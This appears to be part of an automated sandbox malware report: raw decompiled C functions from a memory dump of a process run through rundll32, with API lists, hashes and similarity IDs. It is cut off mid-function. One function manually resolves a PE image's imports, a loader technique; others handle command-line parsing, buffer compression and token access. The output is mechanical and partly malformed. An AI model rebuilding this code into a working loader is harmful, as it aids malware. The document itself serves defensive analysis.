                                                                      • API ID: strchr$_snprintf
                                                                      • String ID: %.*g
                                                                      • API String ID: 3619936089-952554281
                                                                      • Opcode ID: 6adaa74beb85aeec141fa88a1801dd1eb927622ef63937cde68cfaf1c169d7d3
                                                                      • Instruction ID: 32e81a19d882fdbdef3de77922f43fff69d9a1b2170e2eb4254d10402b5af66a
                                                                      • Opcode Fuzzy Hash: 6adaa74beb85aeec141fa88a1801dd1eb927622ef63937cde68cfaf1c169d7d3
                                                                      • Instruction Fuzzy Hash: 7421272260065D26E7265E189CC5FAE379C9F21328F19C1AEFC7486580E7A0B96443D9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 50%
                                                                      			E041C3D9F(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                      				intOrPtr* _v8;
                                                                      				signed int* _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				intOrPtr _v32;
                                                                      				struct HINSTANCE__* _v36;
                                                                      				intOrPtr _v40;
                                                                      				signed int _v44;
                                                                      				struct HINSTANCE__* _v48;
                                                                      				intOrPtr _v52;
                                                                      				signed int _v56;
                                                                      				intOrPtr _v60;
                                                                      				signed int _v64;
                                                                      				signed int _t109;
                                                                      				signed int _t112;
                                                                      				signed int _t115;
                                                                      				void* _t163;
                                                                      				void* _t167;
                                                                      
                                                                      				_t167 = __ecx;
                                                                      				_v44 = _v44 & 0x00000000;
                                                                      				if(_a4 != 0) {
                                                                      					_v48 = GetModuleHandleA("kernel32.dll");
                                                                      					_v40 = E041B93DC(_t167, _v48, "GetProcAddress");
                                                                      					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                      					_v32 = _v52;
                                                                      					_t109 = 8;
                                                                      					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                      						L24:
                                                                      						return 0;
                                                                      					}
                                                                      					_v56 = 0x80000000;
                                                                      					_t112 = 8;
                                                                      					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                      					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                      						_v8 = _v8 + 0x14;
                                                                      					}
                                                                      					_t115 = 8;
                                                                      					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                      					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                      						_t34 = _v8 + 0xc; // 0xffff
                                                                      						_v36 = LoadLibraryA( *_t34 + _a4);
                                                                      						if(_v36 != 0) {
                                                                      							if( *_v8 == 0) {
                                                                      								_t43 = _v8 + 0x10; // 0xb8
                                                                      								_v12 =  *_t43 + _a4;
                                                                      							} else {
                                                                      								_v12 =  *_v8 + _a4;
                                                                      							}
                                                                      							_v28 = _v28 & 0x00000000;
                                                                      							while( *_v12 != 0) {
                                                                      								_v24 = _v24 & 0x00000000;
                                                                      								_v16 = _v16 & 0x00000000;
                                                                      								_v64 = _v64 & 0x00000000;
                                                                      								_v20 = _v20 & 0x00000000;
                                                                      								if(( *_v12 & _v56) == 0) {
                                                                      									_v60 =  *_v12 + _a4;
                                                                      									_v20 = _v60 + 2;
                                                                      									_t73 = _v8 + 0x10; // 0xb8
                                                                      									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
                                                                      									_v16 = _v40(_v36, _v20);
                                                                      								} else {
                                                                      									_v24 =  *_v12;
                                                                      									_v20 = _v24 & 0x0000ffff;
                                                                      									_v16 = _v40(_v36, _v20);
                                                                      								}
                                                                      								if(_v24 != _v16) {
                                                                      									_v44 = _v44 + 1;
                                                                      									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                      										 *_v12 = _v16;
                                                                      									} else {
                                                                      										_t89 = _v8 + 0x10; // 0xb8
                                                                      										 *( *_t89 + _a4 + _v28) = _v16;
                                                                      									}
                                                                      								}
                                                                      								_v12 =  &(_v12[1]);
                                                                      								_v28 = _v28 + 4;
                                                                      							}
                                                                      							_v8 = _v8 + 0x14;
                                                                      							continue;
                                                                      						}
                                                                      						_t163 = 0xfffffffd;
                                                                      						return _t163;
                                                                      					}
                                                                      					goto L24;
                                                                      				}
                                                                      				return __eax | 0xffffffff;
                                                                      			}
























                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 041C3DBC
                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 041C3E55
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLibraryLoadModule
                                                                      • String ID: GetProcAddress$kernel32.dll
                                                                      • API String ID: 4133054770-1584408056
                                                                      • Opcode ID: 2f4d619cc2574ef7f2ff92d210abb18af2ea50d26cca622f2789017ec716f75d
                                                                      • Instruction ID: b1a5ccf04b54d05ae3daa8a8f79f765fa5460677600314f3f3924b0412d17a48
                                                                      • Opcode Fuzzy Hash: 2f4d619cc2574ef7f2ff92d210abb18af2ea50d26cca622f2789017ec716f75d
                                                                      • Instruction Fuzzy Hash: F9618E75E00209EFDB04CF98C885BADBBF1FF18315F248599E825AB291D374AA80DF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 99%
                                                                      			E041C4BF0(int _a4, signed int _a8) {
                                                                      				int _v8;
                                                                      				intOrPtr _v12;
                                                                      				signed int _v16;
                                                                      				void* __esi;
                                                                      				void* _t137;
                                                                      				signed int _t141;
                                                                      				intOrPtr* _t142;
                                                                      				signed int _t145;
                                                                      				signed int _t146;
                                                                      				intOrPtr _t151;
                                                                      				intOrPtr _t161;
                                                                      				intOrPtr _t162;
                                                                      				intOrPtr _t167;
                                                                      				intOrPtr _t170;
                                                                      				signed int _t172;
                                                                      				intOrPtr _t173;
                                                                      				int _t184;
                                                                      				intOrPtr _t185;
                                                                      				intOrPtr _t188;
                                                                      				signed int _t189;
                                                                      				void* _t195;
                                                                      				int _t202;
                                                                      				int _t208;
                                                                      				intOrPtr _t217;
                                                                      				signed int _t218;
                                                                      				int _t219;
                                                                      				intOrPtr _t220;
                                                                      				signed int _t221;
                                                                      				signed int _t222;
                                                                      				int _t224;
                                                                      				int _t225;
                                                                      				signed int _t227;
                                                                      				intOrPtr _t228;
                                                                      				int _t232;
                                                                      				int _t234;
                                                                      				signed int _t235;
                                                                      				int _t239;
                                                                      				void* _t240;
                                                                      				int _t245;
                                                                      				int _t252;
                                                                      				signed int _t253;
                                                                      				int _t254;
                                                                      				void* _t257;
                                                                      				void* _t258;
                                                                      				int _t259;
                                                                      				intOrPtr _t260;
                                                                      				int _t261;
                                                                      				signed int _t269;
                                                                      				signed int _t271;
                                                                      				intOrPtr* _t272;
                                                                      				void* _t273;
                                                                      
                                                                      				_t253 = _a8;
                                                                      				_t272 = _a4;
                                                                      				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                      				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                      				_t228 =  *_t4;
                                                                      				_t137 =  *_t3 + 0xfffffffb;
                                                                      				_t229 =  <=  ? _t137 : _t228;
                                                                      				_v16 =  <=  ? _t137 : _t228;
                                                                      				_t269 = 0;
                                                                      				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                      				asm("o16 nop [eax+eax]");
                                                                      				while(1) {
                                                                      					_t8 = _t272 + 0x16bc; // 0x40f8458b
                                                                      					_t141 =  *_t8 + 0x2a >> 3;
                                                                      					_v12 = 0xffff;
                                                                      					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                      					if(_t217 < _t141) {
                                                                      						break;
                                                                      					}
                                                                      					_t11 = _t272 + 0x6c; // 0x1d0fd8a1
                                                                      					_t12 = _t272 + 0x5c; // 0x54e85000
                                                                      					_t245 =  *_t11 -  *_t12;
                                                                      					_v8 = _t245;
                                                                      					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                      					_t247 =  <  ? _t195 : _v12;
                                                                      					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                      					if(_t227 >= _v16) {
                                                                      						L7:
                                                                      						if(_t253 != 4) {
                                                                      							L10:
                                                                      							_t269 = 0;
                                                                      							__eflags = 0;
                                                                      						} else {
                                                                      							_t285 = _t227 - _t195;
                                                                      							if(_t227 != _t195) {
                                                                      								goto L10;
                                                                      							} else {
                                                                      								_t269 = _t253 - 3;
                                                                      							}
                                                                      						}
                                                                      						E041C7C10(_t272, _t272, 0, 0, _t269);
                                                                      						_t18 = _t272 + 0x14; // 0xc703f045
                                                                      						_t19 = _t272 + 8; // 0x8d000040
                                                                      						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                      						_t22 = _t272 + 0x14; // 0xc703f045
                                                                      						_t23 = _t272 + 8; // 0x8d000040
                                                                      						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                      						_t26 = _t272 + 0x14; // 0xc703f045
                                                                      						_t27 = _t272 + 8; // 0x8d000040
                                                                      						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                      						_t30 = _t272 + 0x14; // 0xc703f045
                                                                      						_t31 = _t272 + 8; // 0x8d000040
                                                                      						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                      						E041C6970(_t285,  *_t272);
                                                                      						_t202 = _v8;
                                                                      						_t273 = _t273 + 0x14;
                                                                      						if(_t202 != 0) {
                                                                      							_t208 =  >  ? _t227 : _t202;
                                                                      							_v8 = _t208;
                                                                      							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                      							_t37 = _t272 + 0x5c; // 0x54e85000
                                                                      							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                      							_t273 = _t273 + 0xc;
                                                                      							_t252 = _v8;
                                                                      							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                      							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                      							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                      							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                      							_t227 = _t227 - _t252;
                                                                      						}
                                                                      						if(_t227 != 0) {
                                                                      							E041C6AB0( *_t272,  *( *_t272 + 0xc), _t227);
                                                                      							_t273 = _t273 + 0xc;
                                                                      							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                      							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                      							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                      						}
                                                                      						_t253 = _a8;
                                                                      						if(_t269 == 0) {
                                                                      							continue;
                                                                      						}
                                                                      					} else {
                                                                      						if(_t227 != 0 || _t253 == 4) {
                                                                      							if(_t253 != 0 && _t227 == _t195) {
                                                                      								goto L7;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				_t142 =  *_t272;
                                                                      				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                      				_a4 = _t232;
                                                                      				if(_t232 == 0) {
                                                                      					_t83 = _t272 + 0x6c; // 0x1d0fd8a1
                                                                      					_t254 =  *_t83;
                                                                      				} else {
                                                                      					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                      					_t224 =  *_t59;
                                                                      					if(_t232 < _t224) {
                                                                      						_t65 = _t272 + 0x3c; // 0x830cc483
                                                                      						_t66 = _t272 + 0x6c; // 0x1d0fd8a1
                                                                      						_t260 =  *_t66;
                                                                      						__eflags =  *_t65 - _t260 - _t232;
                                                                      						if( *_t65 - _t260 <= _t232) {
                                                                      							_t67 = _t272 + 0x38; // 0xf47d8bff
                                                                      							_t261 = _t260 - _t224;
                                                                      							 *(_t272 + 0x6c) = _t261;
                                                                      							memcpy( *_t67,  *_t67 + _t224, _t261);
                                                                      							_t70 = _t272 + 0x16b0; // 0x1488087d
                                                                      							_t188 =  *_t70;
                                                                      							_t273 = _t273 + 0xc;
                                                                      							_t232 = _a4;
                                                                      							__eflags = _t188 - 2;
                                                                      							if(_t188 < 2) {
                                                                      								_t189 = _t188 + 1;
                                                                      								__eflags = _t189;
                                                                      								 *(_t272 + 0x16b0) = _t189;
                                                                      							}
                                                                      						}
                                                                      						_t73 = _t272 + 0x38; // 0xf47d8bff
                                                                      						_t74 = _t272 + 0x6c; // 0x1d0fd8a1
                                                                      						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                                                      						_t225 = _a4;
                                                                      						_t273 = _t273 + 0xc;
                                                                      						_t76 = _t272 + 0x6c;
                                                                      						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                                                      						__eflags =  *_t76;
                                                                      						_t78 = _t272 + 0x6c; // 0x1d0fd8a1
                                                                      						_t184 =  *_t78;
                                                                      						_t79 = _t272 + 0x2c; // 0x8df075ff
                                                                      						_t239 =  *_t79;
                                                                      					} else {
                                                                      						 *(_t272 + 0x16b0) = 2;
                                                                      						_t61 = _t272 + 0x38; // 0xf47d8bff
                                                                      						memcpy( *_t61,  *_t142 - _t224, _t224);
                                                                      						_t62 = _t272 + 0x2c; // 0x8df075ff
                                                                      						_t184 =  *_t62;
                                                                      						_t273 = _t273 + 0xc;
                                                                      						_t225 = _a4;
                                                                      						_t239 = _t184;
                                                                      						 *(_t272 + 0x6c) = _t184;
                                                                      					}
                                                                      					_t254 = _t184;
                                                                      					 *(_t272 + 0x5c) = _t184;
                                                                      					_t81 = _t272 + 0x16b4; // 0xff4d8a39
                                                                      					_t185 =  *_t81;
                                                                      					_t240 = _t239 - _t185;
                                                                      					_t241 =  <=  ? _t225 : _t240;
                                                                      					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                      					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                      				}
                                                                      				if( *(_t272 + 0x16c0) < _t254) {
                                                                      					 *(_t272 + 0x16c0) = _t254;
                                                                      				}
                                                                      				if(_t269 == 0) {
                                                                      					_t218 = _a8;
                                                                      					__eflags = _t218;
                                                                      					if(_t218 == 0) {
                                                                      						L34:
                                                                      						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                      						_t219 =  *_t272;
                                                                      						_t145 =  *_t89 - _t254 - 1;
                                                                      						_a4 =  *_t272;
                                                                      						_t234 = _t254;
                                                                      						_v16 = _t145;
                                                                      						_v8 = _t254;
                                                                      						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                      						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                      							_v8 = _t254;
                                                                      							_t95 = _t272 + 0x5c; // 0x54e85000
                                                                      							_a4 = _t219;
                                                                      							_t234 = _t254;
                                                                      							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                      							__eflags =  *_t95 -  *_t97;
                                                                      							if( *_t95 >=  *_t97) {
                                                                      								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                      								_t167 =  *_t98;
                                                                      								_t259 = _t254 - _t167;
                                                                      								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                      								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                      								 *(_t272 + 0x6c) = _t259;
                                                                      								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                      								_t103 = _t272 + 0x16b0; // 0x1488087d
                                                                      								_t170 =  *_t103;
                                                                      								_t273 = _t273 + 0xc;
                                                                      								__eflags = _t170 - 2;
                                                                      								if(_t170 < 2) {
                                                                      									_t172 = _t170 + 1;
                                                                      									__eflags = _t172;
                                                                      									 *(_t272 + 0x16b0) = _t172;
                                                                      								}
                                                                      								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                      								_t145 = _v16 +  *_t106;
                                                                      								__eflags = _t145;
                                                                      								_a4 =  *_t272;
                                                                      								_t108 = _t272 + 0x6c; // 0x1d0fd8a1
                                                                      								_t234 =  *_t108;
                                                                      								_v8 = _t234;
                                                                      							}
                                                                      						}
                                                                      						_t255 = _a4;
                                                                      						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                      						__eflags = _t145 - _t220;
                                                                      						_t221 =  <=  ? _t145 : _t220;
                                                                      						_t146 = _t221;
                                                                      						_a4 = _t221;
                                                                      						_t222 = _a8;
                                                                      						__eflags = _t146;
                                                                      						if(_t146 != 0) {
                                                                      							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                      							E041C6AB0(_t255,  *_t114 + _v8, _t146);
                                                                      							_t273 = _t273 + 0xc;
                                                                      							_t117 = _t272 + 0x6c;
                                                                      							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                      							__eflags =  *_t117;
                                                                      							_t119 = _t272 + 0x6c; // 0x1d0fd8a1
                                                                      							_t234 =  *_t119;
                                                                      						}
                                                                      						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                      						if( *(_t272 + 0x16c0) < _t234) {
                                                                      							 *(_t272 + 0x16c0) = _t234;
                                                                      						}
                                                                      						_t122 = _t272 + 0x16bc; // 0x40f8458b
                                                                      						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                      						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                      						__eflags = _t257 - 0xffff;
                                                                      						_t258 =  >  ? 0xffff : _t257;
                                                                      						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                      						_t151 =  *_t124;
                                                                      						_t125 = _t272 + 0x5c; // 0x54e85000
                                                                      						_t235 = _t234 -  *_t125;
                                                                      						__eflags = _t258 - _t151;
                                                                      						_t152 =  <=  ? _t258 : _t151;
                                                                      						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                      						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                      							L49:
                                                                      							__eflags = _t235 - _t258;
                                                                      							_t154 =  >  ? _t258 : _t235;
                                                                      							_a4 =  >  ? _t258 : _t235;
                                                                      							__eflags = _t222 - 4;
                                                                      							if(_t222 != 4) {
                                                                      								L53:
                                                                      								_t269 = 0;
                                                                      								__eflags = 0;
                                                                      							} else {
                                                                      								_t161 =  *_t272;
                                                                      								__eflags =  *(_t161 + 4);
                                                                      								_t154 = _a4;
                                                                      								if( *(_t161 + 4) != 0) {
                                                                      									goto L53;
                                                                      								} else {
                                                                      									__eflags = _t154 - _t235;
                                                                      									if(_t154 != _t235) {
                                                                      										goto L53;
                                                                      									} else {
                                                                      										_t269 = _t222 - 3;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                      							_t132 = _t272 + 0x5c; // 0x54e85000
                                                                      							E041C7C10(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                      							_t134 = _t272 + 0x5c;
                                                                      							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                      							__eflags =  *_t134;
                                                                      							E041C6970( *_t134,  *_t272);
                                                                      						} else {
                                                                      							__eflags = _t235;
                                                                      							if(_t235 != 0) {
                                                                      								L46:
                                                                      								__eflags = _t222;
                                                                      								if(_t222 != 0) {
                                                                      									_t162 =  *_t272;
                                                                      									__eflags =  *(_t162 + 4);
                                                                      									if( *(_t162 + 4) == 0) {
                                                                      										__eflags = _t235 - _t258;
                                                                      										if(_t235 <= _t258) {
                                                                      											goto L49;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								__eflags = _t222 - 4;
                                                                      								if(_t222 == 4) {
                                                                      									goto L46;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						asm("sbb edi, edi");
                                                                      						_t271 =  ~_t269 & 0x00000002;
                                                                      						__eflags = _t271;
                                                                      						return _t271;
                                                                      					} else {
                                                                      						__eflags = _t218 - 4;
                                                                      						if(_t218 == 4) {
                                                                      							goto L34;
                                                                      						} else {
                                                                      							_t173 =  *_t272;
                                                                      							__eflags =  *(_t173 + 4);
                                                                      							if( *(_t173 + 4) != 0) {
                                                                      								goto L34;
                                                                      							} else {
                                                                      								_t88 = _t272 + 0x5c; // 0x54e85000
                                                                      								__eflags = _t254 -  *_t88;
                                                                      								if(_t254 !=  *_t88) {
                                                                      									goto L34;
                                                                      								} else {
                                                                      									return 1;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					return 3;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID:
                                                                      • API String ID: 3510742995-0
                                                                      • Opcode ID: 191502db103371a6f119a6cb88a99b4b76512d4ffc08430b1812c3d1ec3f331a
                                                                      • Instruction ID: 0365536306e122d2797d478d28db50ceb8a912c91f27106637c547db9184f577
                                                                      • Opcode Fuzzy Hash: 191502db103371a6f119a6cb88a99b4b76512d4ffc08430b1812c3d1ec3f331a
                                                                      • Instruction Fuzzy Hash: 65D13575604A009FDB24CF6DD9D0AAAB7E2FF98314B24896DE88ACB701D731F944CB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E041BB947(intOrPtr __ecx) {
                                                                      				int _v8;
                                                                      				signed int _v12;
                                                                      				intOrPtr _v16;
                                                                      				short* _v140;
                                                                      				intOrPtr _v144;
                                                                      				short _v664;
                                                                      				signed int _t28;
                                                                      				signed int _t29;
                                                                      				signed int _t30;
                                                                      				int _t40;
                                                                      				signed int _t41;
                                                                      				int _t44;
                                                                      				signed int _t45;
                                                                      				WCHAR* _t52;
                                                                      				signed int _t54;
                                                                      				short* _t55;
                                                                      				void* _t56;
                                                                      
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				_v16 = __ecx;
                                                                      				_t54 = 0;
                                                                      				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                      				_t44 = _v8;
                                                                      				_t41 = 0;
                                                                      				_v12 = _t28;
                                                                      				if(_t44 <= 0) {
                                                                      					L22:
                                                                      					_t29 = _t28 | 0xffffffff;
                                                                      					__eflags = _t29;
                                                                      					return _t29;
                                                                      				} else {
                                                                      					goto L1;
                                                                      				}
                                                                      				do {
                                                                      					L1:
                                                                      					_t52 =  *(_t28 + _t41 * 4);
                                                                      					_t30 =  *_t52 & 0x0000ffff;
                                                                      					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t54 < 0x20) {
                                                                      						 *(_t56 + _t54 * 4 - 0x8c) = _t52;
                                                                      						_t40 = lstrlenW(_t52);
                                                                      						_t45 = 0;
                                                                      						if(_t40 <= 0) {
                                                                      							L11:
                                                                      							_t44 = _v8;
                                                                      							_t54 = _t54 + 1;
                                                                      							goto L12;
                                                                      						} else {
                                                                      							goto L8;
                                                                      						}
                                                                      						do {
                                                                      							L8:
                                                                      							if(_t52[_t45] == 0x2c) {
                                                                      								_t52[_t45] = 0;
                                                                      							}
                                                                      							_t45 = _t45 + 1;
                                                                      						} while (_t45 < _t40);
                                                                      						goto L11;
                                                                      					}
                                                                      					L12:
                                                                      					_t28 = _v12;
                                                                      					_t41 = _t41 + 1;
                                                                      				} while (_t41 < _t44);
                                                                      				if(_t54 != 1) {
                                                                      					if(__eflags <= 0) {
                                                                      						goto L22;
                                                                      					}
                                                                      					_t55 = _v140;
                                                                      					L17:
                                                                      					if( *_t55 == 0x5c ||  *((short*)(_t55 + 2)) == 0x3a) {
                                                                      						E041BC145(_v16, _t55, 0x104);
                                                                      					} else {
                                                                      						GetCurrentDirectoryW(0x104,  &_v664);
                                                                      						_push(0);
                                                                      						_push(_t55);
                                                                      						_push("\\");
                                                                      						_v12 = E041B9924( &_v664);
                                                                      						E041BC145(_v16, _t36, 0x104);
                                                                      						E041B913B( &_v12, 0xfffffffe);
                                                                      					}
                                                                      					return 0;
                                                                      				}
                                                                      				_t55 = _v144;
                                                                      				goto L17;
                                                                      			}

                                                                      APIs
                                                                      • GetCommandLineW.KERNEL32(00000000,00000228,00000228), ref: 041BB95C
                                                                      • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 041BB967
                                                                      • lstrlenW.KERNEL32(00000000), ref: 041BB9A9
                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 041BBA02
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CommandLine$ArgvCurrentDirectorylstrlen
                                                                      • String ID:
                                                                      • API String ID: 159791187-0
                                                                      • Opcode ID: 778219bf3666dabf8d0404cf861441e8eb14488ecc9722ffbd5b27de86b51f9e
                                                                      • Instruction ID: c42b22c9b7f79015e0cc968aa980d13ff5ed64d8ed3df730becdc9a50b334076
                                                                      • Opcode Fuzzy Hash: 778219bf3666dabf8d0404cf861441e8eb14488ecc9722ffbd5b27de86b51f9e
                                                                      • Instruction Fuzzy Hash: 7131D5B1D04119EBDB289FA9C8D4BEDB7B4EF45354F104099D485E3990EB74B981CBD0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E041BDB58(void* __ecx) {
                                                                      				void* _v8;
                                                                      				void* _t10;
                                                                      				intOrPtr _t13;
                                                                      
                                                                      				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
                                                                      					L4:
                                                                      					_t10 = _v8;
                                                                      				} else {
                                                                      					if(GetLastError() != 0x3f0) {
                                                                      						L3:
                                                                      						_t10 = 0;
                                                                      					} else {
                                                                      						_t13 =  *0x41d0fa0; // 0x439f8a0
                                                                      						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x130))(), 8,  &_v8) != 0) {
                                                                      							goto L4;
                                                                      						} else {
                                                                      							goto L3;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t10;
                                                                      			}

                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 041BDB6B
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,041BDC9D,00000000,041B0000), ref: 041BDB72
                                                                      • GetLastError.KERNEL32(?,?,041BDC9D,00000000,041B0000), ref: 041BDB79
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,041BDC9D,00000000,041B0000), ref: 041BDB9E
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 1515895013-0
                                                                      • Opcode ID: 48ce55b3d50b36d644e475aa8e1670126f80f99e6083846f46a2a22da9eccede
                                                                      • Instruction ID: dc1e0f5d31234d3cbb17f878997a56dc98a48c3f53e44f1a32101440436e7101
                                                                      • Opcode Fuzzy Hash: 48ce55b3d50b36d644e475aa8e1670126f80f99e6083846f46a2a22da9eccede
                                                                      • Instruction Fuzzy Hash: BDF09071601109AFDB44ABA5ED89F9A3BECFB08345F140450E242D3040DB24BE408B55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E041BA222(void* __ecx, void* __edx) {
                                                                      				WCHAR* _v8;
                                                                      				char _v12;
